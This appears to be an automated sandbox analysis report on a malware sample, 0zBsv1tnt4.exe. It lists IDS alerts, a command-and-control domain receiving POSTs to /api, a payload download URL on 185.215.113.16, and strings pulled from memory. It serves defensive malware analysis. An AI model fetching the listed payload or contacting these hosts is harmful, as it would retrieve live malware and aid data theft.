6c 69 69 6f 64 00 40 2b 00 00 a0 00 00 00 38 2b 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 73 75 71 75 79 72 68 00 20 00 00 00 e0 2b 00 00 04 00 00 00 a0 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2c 00 00 22 00 00 00 a4 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 104.21.11.101 104.21.11.101

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49715 -> 185.215.113.16:80

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: mindhandru.buzz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz

Source: 0zBsv1tnt4.exe	String found in binary or memory: http://185.215.113.16/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/O
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeGd
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeSd
Source: 0zBsv1tnt4.exe, 00000000.00000002.1870836699.00000000010FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeeWebKit/537.36
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/z
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686542592.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643183119.00000000014CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft2_
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_112.6.dr	String found in binary or memory: http://schema.org/Organization
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_112.6.dr, chromecache_89.6.dr, chromecache_122.6.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_112.6.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_112.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_112.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/nschonni
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: chromecache_112.6.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001462000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1537563256.000000000150C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/==
Source: 0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1591109396.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1598062166.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/Cl
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/DataA4
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/P)
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564938918.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1565469827.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564296751.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/aB
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/d
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/s
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/tC
Source: 0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1626048164.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/wK
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000003.1597724019.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1597829853.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api
Source: 0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api;WU
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.00000000014EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/apiz
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_101.6.dr	String found in binary or memory: https://schema.org
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
Source: chromecache_101.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
